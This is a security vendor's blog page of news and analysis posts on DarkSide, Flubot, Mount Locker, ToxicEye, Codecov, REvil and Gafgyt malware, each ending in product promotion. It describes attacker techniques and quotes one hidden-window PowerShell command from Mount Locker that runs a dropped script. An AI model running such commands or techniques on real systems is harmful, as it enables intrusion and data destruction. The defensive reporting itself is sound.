Jerry, Author at Safernet

Darkside Ransomware Takes Colonial Pipeline Offline

Post On: 20 May, 2021 By : Jerry

It would be hard to blame someone for believing the Microsoft Exchange exploits would be the worst cyberattack of 2021, but the Darkside Ransomware attack on the Colonial Pipeline is shaping up to be a far greater threat. Colonial Pipeline, which supplies 45% of the East Coast’s fuel, revealed a ransomware outbreak on the company’s systems, which forced the suspension of operations and some IT systems on Friday last. The attack took place on May 7th, and at the time of writing, systems for the pipeline are still offline.

Often Ransomware attacks take place on private enterprises, as ransomware is usually a for-profit vehicle. However, the Darkside ransomware attack has hit major critical infrastructure, which means the attack is much more serious in nature.

Colonial Pipeline says that a system restart plan is being “developed” and some small lateral lines are back in service. However, it may be days before full functions are restored, and in the meantime, gasoline futures are rising and there is concern that some parts of the US may experience fuel shortages. Gasoline futures jumped to their highest level in three years due to the cyberattack.

The USDOT Federal Motor Carrier Safety Administration (FMCSA) agency has issued a Regional Emergency Declaration to try and push back against the supply disruption through temporary exemptions for fuel transport on the road and the permissible hours that drivers are allowed to work for.

The FBI has confirmed that the attack is indeed the Darkside ransomware strain. “The FBI confirms that the Darkside ransomware is responsible for the compromise of the Colonial Pipeline networks,” the law enforcement agency says. “We continue to work with the company and our government partners on the investigation.”

However it is unclear exactly who is behind the attack. Darkside Ransomware was created by the Darkside gang, who sell it as Ransomware-as-a-service (RaaS), and use it themselves. While one could hazard a guess and say it was the gang themselves, this is unlikely given their MO and the fact that they have denied it.

Darkside first appeared in the summer of 2020 and targetting private enterprise. Unusually for a hacking organization, they made public pledges not to attack critical infrastructure, healthcare, and government agencies. This is well and good, but given that the gang sells their malware, they cannot guarantee it won’t be used for aims that don’t align with their own.

Days after the attack, The DarkSide ransomware gang issued a press statement stating that their organization is ‘apolitical’ and is not associated with any government.

Darkside Ransomware Gang Press Release

Promising extra checks on their customers is a hopeful statement, but in the shadowy world of hackers, it doesn’t mean much. It isn’t the first time Darkside has tried to gain good press, as last year they donated tens of thousands of dollars to charities, which they earned from Darkside Ransomware attacks.

As part of their contract with customers, they earned 20-30% of the ransoms taken from targets.

While the true identity of those who deployed the darkside ransomware is unclear, it is highly likely to be from Russia or an ex-Soviet state. If it was political in nature, it may well be Cozy Bear or Fancy Bear, two state-sponsored group’s operating within Russias’ GRU intelligence service. This of course brings about the question – Why didn’t they use their own ransomware? This is also unclear, but it could be an obfuscation technique.

As well as Russia, the culprits may be Lazarus Group, Pyongyang’s hacking organisation.

Spokespeople from Colonial Pipeline have not yet confirmed how Darkside Ransomware infiltrated their systems. Jon Niccolls from Checkpoint believes the attackers likely gained access to Colonial’s computer system through the administrative side of the business.

“Some of the biggest attacks we’ve seen all started with an email,” Niccolls said “An employee may have been tricked into downloading some malware, for example We’ve also seen recent examples of hackers getting in using weaknesses or compromise of a third-party software. Hackers will use any chance they get to gain a foothold in a network.”

Experts said that gasoline prices are unlikely to be affected if the pipeline is back to normal in the next few days but that the incident — the worst cyberattack to date on critical US infrastructure — should serve as a wake-up call to companies about the vulnerabilities they face.

Darkside Ransomware Analysis

This analysis of Darkside was carried out largely by researchers at Cybereason.

According to Hack Forums, the DarkSide team recently made an announcement that DarkSide 2.0 has been released. According to the group, it is equipped with the fastest encryption speed on the market, and even includes Windows and Linux versions.

The team is very active on hack forums and keeps its customers updated with news related to darkside ransomware. In an effort to grow and expand their operations, the group has started an affiliates program for potential users.

Like many other ransomware variants, DarkSide follows the double extortion trend, which means the threat actors not only encrypt the user’s data, but first exfiltrate the data and threaten to make it public if the ransom demand is not paid. This technique effectively renders the strategy of backing up data as a precaution against a ransomware attack moot.

DarkSide is observed being used against targets in English-speaking countries, and appears to avoid targets in countries associated with former Soviet Bloc nations. The ransom demand ranges between US$200,000 to $2,000,000, and according to their website, the group has published stolen data from more than 40 victims, which is estimated to be just a fraction of the overall number of victims.

Unlike many ransomware variants such as Maze, which was employed to successfully attack suburban Washington schools, the group behind DarkSide appears to have a code of conduct that prohibits attacks against hospitals, hospices, schools, universities, non-profit organizations, and government agencies

Rules for those purchasing Darkside Ransomware

After gaining an initial foothold in the network, the attackers start to collect information about the environment and the company. If it turns out that the potential target is on the attacker’s list of prohibited organizations to attack (ie: hospitals, hospices, schools, universities, non-profit organizations, or government agencies), they don’t move forward with the attack.

If not on the prohibited list, the attackers continue to carry out the operation. The attackers begins to collect files, credentials and other sensitive information, and exfilitrate it. Following this, the attackers use PowerShell to download the DarkSide binary as “update.exe” using the “DownloadFile” command, abusing Certutil.exe and Bitsadmin.exe in the process.

In addition to downloading the DarkSide binary into the C:\Windows and temporary directories, the attacker also creates a shared folder on the infected machine and uses PowerShell to download a copy of the malware there.

After successfully gaining a foothold on one machine in the environment, the attacker begins to move laterally in the environment, with the main goal of conquering the Domain Controller (DC).

Once the attackers make it to the DC, they start to collect other sensitive information and files, including dumping the SAM hive that stores targets’ passwords

In addition to collecting data from the DC, the attackers use PowerShell to download the DarkSide binary from the shared folder created on the previously infected host.

When the DarkSide ransomware first executes on the infected host, it checks the language on the system, using GetSystemDefaultUILanguage() and GetUserDefaultLangID() functions to avoid systems located in the former Soviet Bloc countries from being encrypted.

Darkside Ransomware checking if the installed language is Russian

DarkSide then proceeds to stop the all services related to security and backup solutions. It then creates a connection to its C2 (command and control) server. After uninstalling the Volume Shadow Copy Service (VSS), DarkSide then deletes the shadow copies by launching an obfuscated PowerShell script that uses WMI to delete them.

The malware then enumerates the running processes and terminates different processes to unlock their files so it can both steal related information stored in the files and encrypt them.

DarkSide creates a unique User_ID string for the victim, and adds it to the encrypted files extension as follows:
<File_name>.{userid}. In addition, the malware also changes the icons for the encrypted files and changes the background of the desktop to all black, with the text “All your files have been encrypted!”

Finally, it leaves the Ransomware note:

Protection

While Darkside as an organisation may have intentions that some would consider ‘harmless’, it is very clear that their ransomware product is unchecked and can be used on anybody. It is critical that business owners have the right tools to keep their company’s safe in the face of ever-evolving cyberthreats like Darkside Ransomware.

SaferNet is the perfect solution to the cybersecurity issues that individuals, families, and businesses face today. It not only connects every device using a secure, 24/7 always on, military grade VPN, but it also stops outside cyberthreats, malware and viruses as well. On SaferNet, all users are protected anywhere in the world, all the time, on any cellular or Wi-Fi network. In addition to SaferNet’s VPN and cyber protection, it also offers a range of employee or parental/family internet controls including internet filtering, monitoring, scheduling, and blocking access to websites or even entire website categories

Typically, a business or family would need 3 separate services for a VPN, Malware Protection, and Internet Controls; SaferNet offers all 3 features in one service. SaferNet truly is an endpoint security presence that can be implemented in minutes around the world, on phones, laptops, tablets, and computers at an economical price point that caters to all sizes of businesses and families. SaferNet guarantees a smooth setup and installation process that takes only minutes, and an easily accessible control hub for you to monitor all your employee’s or family members devices; including activity, time spent online, and threats blocked.

Flubot Spyware spreading to Android Devices Through Delivery Scam

Post On: 20 May, 2021 By : Jerry

Android users across the UK and EU are being warned of a new Spyware scam spreading to devices. The attack vector is via text and delivers a Spyware strain named Flubot. The malware is delivered to targets through SMS texts and prompts them to install a “missed package delivery” app. If the target follows the link, they are taken to a delivery website and asked to download the delivery company’s app. The app, of course, is the Flubot spyware. Upon installation, Flubot is immediately dangerous and sets about gaining permissions, stealing banking information and credentials, lifting passwords stored on the device, and extracting away various pieces of personal information.

Flubot connects to a hacker’s command-and-control center (C&C), where it relays all data back to. The spyware sends text messages to everyone in the users’ contact list with the same initial link, aiming to propagate virally.

The U.K.’s National Cyber Security Centre (NCSC) has issued security guidance about how to identify and remove FluBot malware, while network providers, including Three and Vodafone, have also issued warnings to users over the text message attacks.

So far, most of the phishing texts are branded to look like they are being sent from DHL, the NCSC said, but warned, “the scam could change to abuse other company brands.”

The NCSC claims Flubot is damaging enough that the only solution for removal is a factory reset.

The text a target receives. Though this example shows DHL, other courier companies have been reported.

The attack has been reported to have several variations. The most obvious is changing the supposed courier company that sends the text. In another case, the text purports to be from Amazon and includes an almost legitimate-looking link. However, the link swaps out an ‘o’ for a zero within.

Telecom carriers Vodafone UK, Three UK and EE have all confirmed the scam is traversing their networks, which collectively have more than 58 million subscribers across the country.

Anyone who receives what they believe to be a scam text is advised not to click on any links and forward the text to “7726” a “free spam-reporting line” established to combat fraud in the U.K. Finally, delete the message and block the sender.

The fraudulent site where the target is asked to download spyware

If a user has already clicked on the link, the NCSC warned not to enter any password or other personal information. To remove the malware from the infected device, “Perform a factory reset as soon as possible,” the NSCS guidance reads. “The process for doing this will vary based on the device manufacturer…Note that if you don’t have backups enabled, you will lose data.”

The NCSC added that if a user has entered their personal information, it’s critical to change those passwords immediately to prevent further compromise.

The flubot spyware was initially spotted in the UK, followed by Hungary and other EU states. It is believed that the campaign will eventually hit American shores.

Flubot Spyware Analysis

The analysis of flubot spyware has been carried out by Prodaft.

FluBot uses a common Android malware packer that loads the decrypted DEX in runtime. Without any hooks, analysts can access the dropped DEX in the ‘app_DynamicOptDex‘folder. Only string obfuscation is present in the decrypted DEX.

Flubot spyware has a number of commands, most of which are self-explanatory.

Other than targeted apps, FluBot can trigger on-demand credit card phishing if it gets the “CARD_BLOCK” command from the server. FluBot blocks all incoming notifications when the BLOCK command is received from the server. FluBot malware is able make USSD calls to the codes sent from the C&C server.

FluBot is also able to set itself as the default SMS application by abusing accessibility permissions, thus allowing the malware to send SMS messages on demand.

Once it has infected the victim’s device, FluBot sends all phonebook (contact list) numbers to the C&C server. FluBot uses a domain generation algorithm (DGA) to obtain the address of the C&C server. The DGA creates 2000 domains according to the current year and month. Domains consist of 15 characters with “com,” “ru,” and “cn” TLDs.

The C&C panel contains the tabs “Bots,” “Stats,” “Commands,” “Inject List,” “All Logs,” and “Inject Logs.” The threat actor is able to manage every infected device with the following list of commands in the commands tab.

The C&C panel also contains detailed statistics of the infected victims. At the time of analysis, FluBot had already infected more than 60,000 devices.

The statistics page of the panel also contains details about the device manufacturers, Android version, device language, and telecommunication operator name. When FluBot
successfully obtains the banking credentials, they are sent to the C&C and stored with in a log format.

Each log entry for the infected device may contain the SMS messages, banking credentials, device contacts, and application webview text logs, all of which can be used for extracting any kind of text-based credentials from every application that uses webview panes.

Protection

Given that the flubot spyware can only be cleaned from a phone by way of factory reset, it is extremely important users have protection against threats like it. There are a number of tools that can protect devices, and one of these tools is SaferNet.

Mount Locker Ransomware Update Sees Aggressive Change of Tactics

Post On: 20 May, 2021 By : Jerry

The Mount Locker Ransomware has been exploring new attack vectors and methods in its latest campaigns, according to researchers at GuidePoint. Mount Locker is a relatively new ransomware strain, causing a splash in the Ransomware-as-a-Service (RaaS) scene in 2020. The group behind the virus has been active in its development and released a major update in November that broadened its targeting capabilities, such as searching for extensions used by TurboTax to encrypt. Additionally, it added extra evasive improvements. Since November, Mount Locker ransomware attacks have escalated. As of 2021, another major improvement has been added, which signals “an aggressive shift in Mount Locker’s tactics,” according to an analysis by researchers.

Like many ransomware gangs, the operators lock up files and steal data and threaten to leak it if the ransom isn’t paid in a double-extortion gambit. They’re also known for demanding multimillion-dollar ransoms and stealing vast amounts of data (up to 400 GB).

GuidePoint noted that many tools within Mount Locker Ransomware are legitimate but are clearly being used to nefarious ends. These include the use of AdFind and Bloodhound for Active Directory and user reconnaissance; FTP for file exfiltration; and the pen-testing tool CobaltStrike for lateral movement and the delivery and execution of encryption, potentially through psExec.

“After the environment is mapped, backup systems are identified and neutralized, and data is harvested, systems are encrypted with target-specific ransomware delivered via the established command-and-control channels (C2),” said Drew Schmitt, a senior threat intelligence analyst for GuidePoint, in the analysis. “These payloads include executables, extensions, and unique victim IDs for payment.”

More recent attacks have taken fresh approaches, mostly by using batch scripts. Batch scripts can be designed to disable detection and prevention tools.

“[This] indicates that Mount Locker Ransomware is increasing its capabilities and is becoming a more dangerous threat,” according to Schmitt. “These scripts were not just blanket steps to disable a large swath of tools, they were customized and targeted to the victim’s environment.”

Another change in tactics for the group involves using multiple CobaltStrike servers with unique domains. It’s an added step that helps with detection evasion, but Schmitt noted that it’s not often seen because it requires much more management to put into practice effectively.

The majority of Mount Locker Ransomware attacks have been against the biotech industry. Researchers believe that this may indicate that there may be a larger campaign afoot that aggressively targets healthcare-adjacent industries.

“Biotech companies, in particular, are a prime target for ransomware because of their position in an industry flush not only with cash but also with highly sensitive IP,” Schmitt explained. “Additionally, connections to other research organizations increase the potential to damage the victim’s reputation in the industry and put business dealings at risk.”

Healthcare providers and healthcare supply manufacturers have been the long-suffering victim of ransomware. Due to the time-sensitive nature of their work, they stand to lose more than other potential targets. Researchers noted, “attackers view them as more likely to pay the requested ransom quickly.”

As well as the new attack vectors, Mount Locker Ransomware is seemingly undergoing a name change, to Astro Locker. This is likely more than an aesthetic choice and could mean the group is rebranding entirely in order to step up their game. Schmitt pointed out that “the verbiage and victims listed on both variants’ shaming sites share significant overlap.” He added, “this could signal a shift in the group’s overall tactics and an effort to fully rebrand as a more insidious threat.”

Organizations can look for signs of Mount Locker ransomware or AstroLocker within their environments, such as CobaltStrike stagers and beacons; and, they should monitor for the staging and exfiltration of files via FTP.

“While these would always be cause for alarm…an updated, more aggressive Mount Locker Ransomware and the dramatic increase in attacks attributable to the group make these indicators of compromise particularly alarming,” Schmitt concluded.

Mount Locker Ransomware Analysis

This analysis was carried out by independent ransomware researcher Zawadi Done.

For encryption, Mount Locker ransomware uses Chacha20 to encrypt files and RSA-2048 to encrypt the encryption key. But before the encryption procedure runs, Mount Locker ransomware performs a few tasks that increase the effectiveness of the ransomware.

Both files are packed with a packer written in Visual Basic. The packer checks if the process is being debugged using IsDebuggerPresent if not it continues to unpack the executable into a created segment. Using x64dbg and PE-bear I dumped the full executable from memory and modified the image base and section headers.

The serial number of the used drive is retrieved and used as mutex value. Every time an encrypted file is opened the recovery manual of the ransomware is also opened.

To run a Powershell script it will create a file in the temporary folder C:\Users\IEUser\AppData\Local\Temp\.tmp and write a Powershell script to the file shown belown.

The Powersehll script is then executed by calling:

powershell.exe -windowstyle hidden -c $mypid=’972′[System.IO.File] :: ReadAllText (‘C:\Users\IEUser\AppData\Local \Temp\~1399171.tmp’)|iex”)

This results in the shadow copies being deleted and a list of services and processes being stopped.

Using the API calls CryptAcquireContextW, CryptImportKey, CryptEncrypt an embedded RSA-2048 key is imported and used to encrypt 32 bytes generated by the instruction rdtsc. The plaintext and ciphertext of the bytes will later be used to encrypt other values. The ransomware will search for all types of drives and it skips the following file extensions and directories.

Using CreateFileW and CreateFileMappingW it creates a filehandle and a handle to the file in memory. Instead of using MoveFileW to change the file name, it uses the SetFileInformationByHandle to change the extension of the file.

Using Chacha20 file_32_bytes will be encrypted with 32_bytes as key and the first 12 bytes of 32_bytes as the nonce. Let’s call the ciphertext encrypted_32_bytes. Then it writes file_encrypted_32_bytes and encrypted_32_bytes to the end of the file that will be encrypted.

Using MapViewOfFile the file is mapped in memory with as length the files size or 0x4000000 bytes. This buffer will then be encrypted with Chacha20 using file_32_bytes as key and the first 12 bytes of file_32_bytes as the nonce. After the buffer is encrypted it calls MapViewOfFile to store the buffer to the file on disk.

The encryption procedure is described in the diagram below.

After the files are encrypted, mount locker ransomware will delete itself.

The Mount Locker ransomware drops a ransom note in every folder that it encrypts with the name RecoveryManual.html. This note includes a ClientId which can be used to contact the threat actor on their own “support” portal. This ClientId is based on the computer name XOR’ed by a hardcoded value.

Protection

With threats like Mount Locker Ransomware evolving and expanding everyday, it is important individuals and business owners have adequate protection tools to keep their devices safe. One of these tools is SaferNet.

ToxicEye RAT Abuses Telegram For Command & Control

Post On: 20 May, 2021 By : Jerry

Hackers are leveraging controls from the popular messaging app Telegram to make use of a Remote-Access-Trojan (RAT). Dubbed ToxicEye RAT, it can give a hacker access to control a victim’s device via a Telegram bot even if the app is not installed on the victim’s devices. ToxicEye can take over file systems, load other malware such as ransomware, and steal data from the device, according to a new report by Check Point. Researchers have tracked more than 130 attacks in the last 90 days that used ToxicEye RAT. Hackers use the messaging service to communicate with their own server and return data to it.

Telegram, the cloud-based IM platform has enjoyed a surge in popularity this year because of controversial changes to its rival, WhatsApp’s privacy settings. Telegram was the most downloaded app worldwide for January 2021 with more than 63 million installs and has surpassed 500 million monthly active users. This popularity also extends to the cyber-criminal community. Malware authors are increasingly using Telegram as a ready-made command and control (C&C) system for their malicious products because it offers several advantages compared to conventional web-based malware administration.

“We believe attackers are leveraging the fact that Telegram is used and allowed in almost all organizations, utilizing this system to perform cyber attacks, which can bypass security restrictions,” researchers said.

According to researchers, there are a couple of reasons why Telegram is being used for malware like ToxicEye RAT:

Telegram is a legitimate, easy-to-use and stable service that isn’t blocked by enterprise anti-virus engines, nor by network management tools
Attackers can remain anonymous as the registration process requires only a mobile number
The unique communications features of Telegram mean attackers can easily exfiltrate data from victims’ PCs, or transfer new malicious files to infected machines
Telegram also enables attackers to use their mobile devices to access infected computers from almost any location globally.

The first use of Telegram as an attack vector was by the Masad info-stealer in 2017. The criminals behind Masad realized that using a popular IM service as an integral part of their attacks gave them a number of operational benefits. Since Masad became available on hacking forums, dozens of new types of malware that use Telegram for C&C and exploit Telegram’s features for malicious activity, have been found as ‘off-the-shelf’ weapons in hacking tool repositories in GitHub.

ToxicEye RAT Infection Chain and Functionality

The analysis of the infection chain and functionality was carried out by Check Point.

In the first steps of ToxicEye RAT, the hacker will create a Telegram account and a Telegram ‘bot’. A Telegram bot account is a special remote account with which users can interact by Telegram chat or by adding them to Telegram groups, or by sending requests directly from the input field by typing the bot’s Telegram username and a query.

The bot is embedded into the ToxicEye RAT configuration file and compiled into an executable file. Any victim infected with this malicious payload can be attacked via the Telegram bot, which connects the user’s device back to the attacker’s C&C via Telegram.

In addition, ToxicEye RAT can be downloaded and run by opening a malicious document seen in the phishing emails called solution.doc and by pressing on “enable content.”

ToxicEye RAT Infection Chain

Code snippet example from open source telegram RAT repositories

RATs created using Telegram have many shared modules. However, some of the more dangerous like ToxicEye RAT have several key capabilities that distinguish them from the rest:

Data stealing features – the RAT can locate and steal passwords, computer information, browser history and cookies.
File system control – Deleting and transferring files, or killing PC processes and taking over the PC’s task manager.
I/O hijacking – the RAT can deploy a keylogger, or record audio and video of the victim’s surroundings via the PC’s microphone and camera, or hijack the contents of the clipboard.
Ransomware features – the ability to encrypt and decrypt victim’s files.

A functionality snippet example from chosen Telegram Rat project

After installing the executable file, the attacker can hijack the computer through the bot

The developers who publish these tools disguise their true purpose by defining them as “Remote Administration Tool” or “for educational purpose only”, although some of their characteristics are often found in malicious Trojans.

Given that Telegram can be used to distribute malicious files or as a C&C channel for remotely controlled malware, researchers expect that ToxicEye RAT will be one of many.

Protection & Mitigation

There are several steps for protection and mitigation if you feel you may be infected with ToxicEye RAT:

Search for a file called C:\Users\ToxicEye\rat.exe – if this file exists on your PC, you have been infected and must immediately contact your helpdesk and erase this file from your system.
Monitor the traffic generated from PCs in your organization to a Telegram C&C – if such traffic is detected, and Telegram is not installed as an enterprise solution, this is a possible indicator of compromise
Beware of attachments containing usernames – malicious emails often use your username in their subject line or in the file name of the attachment on it. These indicate suspicious emails: delete such emails, and never open the attachment nor reply to the sender.
Undisclosed or unlisted recipient(s) – if the email recipient(s) has no names, or the names are unlisted or undisclosed – this is a good indication this email is malicious and / or a phishing email.
Always note the language in the email – Social engineering techniques are designed to take advantage of human nature. This includes the fact that people are more likely to make mistakes when they’re in a hurry and are inclined to follow the orders of people in positions of authority. Phishing attacks commonly use these techniques to convince their targets to ignore their potential suspicions about an email and click on a link or open an attachment.
Deploy an automated anti-phishing solution – Minimizing the risk of phishing attacks to the organization requires tools that can spot decoy emails containing attacks like ToxicEye RAT better than the human eye. One of these tools is SaferNet.

Hackers Breach Codecov supply-chain, Exposing Hundreds of Networks

Post On: 19 May, 2021 By : Jerry

Hackers have breached popular code analysis platform Codecov, modifying the Bash Uploader script and exposing sensitive information in customers’ continuous integration (CI) environment. The attack went unnoticed for some time; Codecov noticed the breach in April, yet the modifications were made in early January. Codecov provides tools that help developers measure how much of the source code executes during testing, a process known as code coverage, which indicates the potential for undetected bugs being present in the code. It has a customer base of more than 29,000 enterprises, including Alibaba, Amazon, Atlassian, Washington Post, GoDaddy, Royal Bank of Canada, and Procter & Gamble.

The Bash Uploader script is used by Codecov customers to send code reports to the server. It detects specific settings, collects reports, and uploads.

Hackers focused on this data in their attack campaign, effectively changing the address to where the data was sent – To a server outside Codecov. Due to the data collected by the hackers, Codecov announced that the threat actors could be in possession of any of the following:

Any credentials, tokens, or keys that our customers were passing through their CI runner that would be accessible when the Bash Uploader script was executed
Any services, datastores, and application code that could be accessed with these credentials, tokens, or keys
The git remote information (URL of the origin repository) of repositories using the Bash Uploaders to upload coverage to Codecov in CI

Because of this potential risk, affected users are strongly recommended to re-roll all credentials, tokens, or keys present in the environment variables in the CI processes that relied on Bash Uploader.

Customers using a local version of the script should check if the hackers code added at line 525 exists. If the code below is present, they should replace bash files with Codecov’s latest version of the script.

Offending code, from BleepingComputer‘s report

Regarding the attack, Codev said, “Based upon the forensic investigation results to date, it appears that there was periodic, unauthorized access to a Google Cloud Storage (GCS) key beginning January 31, 2021, which allowed a malicious third-party to alter a version of our bash uploader script to potentially export information subject to continuous integration (CI) to a third-party server. Codecov secured and remediated the script April 1, 2021”

Immediately after learning of the compromise, the company took steps to mitigate the incident, which included the following:

rotating all relevant internal credentials, including the key used to facilitate the modification of the Bash Uploader
auditing where and how the key was accessible
setting up monitoring and auditing tools to ensure that this kind of unintended change cannot occur to the Bash Uploader again
working with the hosting provider of the third-party server to ensure the malicious webserver was properly decommissioned

Hackers Draw Attention of US Federal Investigators

By mid-April, the scale of the attack had grown so much that it had gotten the attention of US Federal Investigators, and comparisons were made to the SolarWinds breach last year. CodeCov have around 29,000 customers, making the attack potentially catastrophic.

According to federal investigators, Codecov hackers deployed automation to use the collected customer credentials to tap into hundreds of client networks, thereby expanding the scope of this system breach beyond just Codecov’s systems.

Codecov’s git, showing Amazon and Alibaba interactions

“The hackers put extra effort into using Codecov to get inside other makers of software development programs, as well as companies that themselves provide many customers with technology services, including IBM,” a federal investigator anonymously told Reuters.

By abusing the customer credentials collected via the Bash Uploader script, hackers could potentially gain credentials for thousands of other restricted systems, according to the investigator.

Some Codecov customers such as IBM stated they have not been breached by the hackers, but have declined to comment further.

An Atlassion spokesperson said, “We are aware of the claims and we are investigating them. At this moment, we have not found any evidence that we have been impacted nor have identified signs of a compromise.”

Hewlett Packard Enterprise claimed their investigation was continuing, “HPE has a dedicated team of professionals investigating this matter, and customers should rest assured we will keep them informed of any impacts and necessary remedies as soon as we know more”

The Federal Bureau of Investigation and the U.S. Department of Homeland Security have not commented on the investigation at this time.

The Codecov is yet another supply-chain attack we’ve seen recently. In the last 12 months, these kinds of attacks have become increasingly common, allowing hackers to breach a multitude of enterprises through one weakest link.

Protection

With many supply-chain attacks occurring, it is important that businesses and families have the best possible tools to keep themselves protected. One of these tools is SaferNet.

Apple Likely To Meet REvil Ransomware Demands As Gang Escalates Global Attacks

Post On: 19 May, 2021 By : Jerry

The gang behind the REvil Ransomware malware strain, Sodin, continue their global attacks into 2021 after demanding Apple pay a $50 Million ransom by May 1st. Despite initially being declined by Apple, the ransomware gang put the squeeze on the tech giant, leaking details of new products just hours before one of Apple’s yearly product unveilings.

The original attack was launched against Quanta, a Global Fortune 500 manufacturer of electronics, which claims Apple among its customers. The Taiwanese-based company was contracted to assemble Apple products, including Apple Watch, Apple Macbook Air and Pro, and ThinkPad, from an Apple-provided set of design schematics.

The REvil Ransomware gang breach Quanta’s servers, steal files, and hold them to ransom. According to a statement posted on the criminals’ dark web site – which they call the “Happy Blog” – Quanta refused to pay the ransom, leading the hackers to begin threatening the company’s customers, as well as leaking a set of blueprints for some products to turn up the pressure, adding more would be leaked every day the ransom went unpaid.

REvil decided to start leaking the ripped off files just hours before Apple’s Spring Loaded event on Tuesday, including schematics for some new iMacs it debuted there.

“In order not to wait for the upcoming Apple presentations, today we, the REvil group, will provide data on the upcoming releases of the company so beloved by many,” according to REvil’s blog post, the report said. “Tim Cook can say thank you Quanta. From our side, a lot of time has been devoted to solving this problem.”

The REvil Ransomware gang has demanded a $50 Million ransom by May 1st. Sodin aren’t particularly known to mess about with ransoms – In the past, they have been strict with deadlines.

“The REvil ransomware gang doesn’t make false promises,” observed Ivan Pittaluga, CTO of enterprise security firm ArcServe said, “They’re notoriously known for leaking data if their demands aren’t met.”

REvil are believed to have made at least $100 Million in 2020, and 2021 looks like it will strengthen their finances even more.

REvil Ransomware Analysis

Deployments of REvil first were observed a few years ago, where attackers leveraged a vulnerability in Oracle WebLogic servers tracked as CVE-2019-2725. It is highly configurable, and it can be customized to behave differently depending on the host. This makes it a highly attractive RaaS client. Some of its features include:

Exploits a kernel privilege escalation vulnerability to gain SYSTEM privileges using CVE-2018-8453.
Whitelists files, folders and extensions from encryption.
Kills specific processes and services prior to encryption.
Encrypts files on local and network storage.
Customizes the name and body of the ransom note, and the contents of the background image.
Exfiltrates encrypted information on the infected host to remote controllers.
REvil uses Hypertext Transfer Protocol Secure (HTTPS) for communication with its controllers.

REvil was first advertised on Russian-language cybercrime forums. The main actor associated with advertising and promoting REvil ransomware is called Unknown aka UNKN. The RaaS is operated as an affiliate service, where affiliates spread the malware by acquiring victims and the REvil operators maintain the malware and payment infrastructure. Affiliates receive 60% to 70% of the ransom payment.

Unkown has acknowledged that his Ransomware is based on the now-retired GrandCrab Ransomware, saying, “We used to be affiliates of the GandCrab affiliate program. We bought the source code and started our own business. We developed custom features for our purposes”

REvil ransomware exploits a kernel privilege escalation vulnerability in win32k.sys tracked as CVE-2018-8453 to gain SYSTEM privileges on the infected host. If the configuration instructs a sample to execute this exploit, it will allocate executable memory, decrypt the exploit code in the newly allocated region and invoke it.

Protection

REvil and other Ransomware clients are some of the most common and deadly cybersecurity threats out there today. Families and businesses should be aware of these threats, and equip the right tools to tackle them. One of these tools is SaferNet.

Gafgyt Botnet Absorbs Code From Notorious Mirai Strain

Post On: 19 May, 2021 By : Jerry

The Gafgyt botnet, known for attacks using IoT devices, has absorbed code from the Mirai botnet. The latter also focuses on using IoT devices in its arsenal and released its code publicly several years ago. Researchers have discovered updated variants of Gafgyt using several functions ripped straight from Mirai, allowing Gafgyt to compromise Huawei, Realtek, and Dasan GPON devices. The botnet was already known to target devices from ASUS and other large IoT manufacturers. It also often uses known vulnerabilities such as CVE-2017-17215 and CVE-2018-10561 to download next-stage payloads to infected devices.

The latest variants have now incorporated several Mirai-based modules, according to research from Uptycs released last Thursday, along with new exploits. Variants of Mirai, and indeed other botnets re-using Mirai modules have become more common since the developers released the code base in 2016.

The capabilities taken from Mirai including different methods to carry out DDOS attacks:

HTTP flooding is a kind of DDoS attack in which the attacker sends a large number of HTTP requests to the targeted server to overwhelm it. The creators of Gafgyt have re-used this code from the leaked Mirai source code.

Comparison between Gafgyt and Mirai’s HTTP Flooding Module

UDP flooding is a type of DDoS attack in which an attacker sends several UDP packets to the victim server as a means of exhausting it. Gafgyt contained this same functionality of UDP flooding, copied from the leaked Mirai source code.

Comparison between Gafgyt and Mirai’s UDP Flooding Module

TCP flood module – Gafgyt performs all types of TCP flood attacks like SYN, PSH, FIN, etc. In this type of attack, the attacker exploits a normal three-way TCP handshake the victim server receives a heavy number of requests, resulting in the server becoming unresponsive. The below image shows the TCP flooder module of Gafgyt, which contained the similar code from Mirai

Comparison between Gafgyt and Mirai’s TCP Flooding Module

STD module – Gafgyt contains an STD module which sends a random string (from a hardcoded array of strings) to a particular IP address. This functionality has also been used by Mirai.

Comparison between Gafgyt and Mirai’s STD Flooding Module

Brute force module – Not only are flooding modules are being used. Recent Gafgyt also contained other modules with little tweaks, like a telnet bruteforce scanner

Comparison between Gafgyt and Mirai’s telnet bruteforce scanner

Meanwhile, the latest versions of Gafgyt contain new approaches for achieving initial compromise of IoT devices, Uptycs found; this is the first step in turning infected devices into bots to later perform DDoS attacks on specifically targeted IP addresses. These include a Mirai-copied module for Telnet brute-forcing, and additional exploits for existing vulnerabilities in Huawei, Realtek and GPON devices.

Gafgyt botnet uses the Huawei exploit (CVE-2017-17215) and the Realtek (CVE-2014-8361) exploit for remote code execution (RCE), which is used to fetch the Gafgyt payload.

“The Gafgyt malware binary embeds RCE exploits for Huawei and Realtek routers, by which the malware binary, using ‘wget’ command, fetches the payload,” according to Uptycs. “[It] gives the execution permission to payload using ‘chmod’ command, [and] executes the payload.”

The GPON exploit (CVE-2018-10561) is used for authentication bypass in vulnerable Dasan GPON routers; here, the malware binary follows the same process, but can also remove the payload on command.

“The IP addresses used for fetching the payloads were generally the open directories where malicious payloads for different architectures were hosted by the attacker,” researchers added.

Before Gafgyt Botnet: The Storied History of Mirai

The Mirai Botnet has been around for several years. While other malware may go into periods of slow activity, Mirai has remained at the forefront of botnet headlines since its inception.

Perhaps Mirai’s most infamous attack came on October 12, 2016. On that date, a massive denial of service (DDoS) attack left much of the internet inaccessible on the U.S. east coast. The attack, which authorities initially feared was the work of a hostile nation-state, was in fact the work of the Mirai botnet.

This attack, which initially had much less grand ambitions grew more powerful than its creators ever dreamed possible. The origins of the botnet were speculated for some time, many believing it to be the work of high-profile cybercriminals. Instead, Mirai was created by a group of three friends who were using the botnet to run an extortion ring on Minecraft servers, a video game they played together.

It encapsulated some clever techniques, including the list of hardcoded passwords. But, in the words of an FBI agent who investigated the attacks, “These kids are super smart, but they didn’t do anything high level—they just had a good idea.”

Much more damaging than simply developing the botnet, the creators released the source code publicly in 2016. This has lead to a wild fire of Mira-related attacks, and researchers estimate there are more than 60 variations of the botnet currently.

Mirai has a few key characteristics seen across all variations of it:

Mirai can launch both HTTP flood and network-level attacks
There are certain IP address ranges that Mirai is hard-wired to avoid, including those owned by GE, Hewlett-Packard, and the U.S. Department of Defense
Upon infecting a device, Mirai looks for other malware on that device and wipes it out, in order to claim the gadget as its own
Mirai’s code contains a few Russian-language strings. This was intended to be a red-herring on its origin, but still remains in variations

Protection

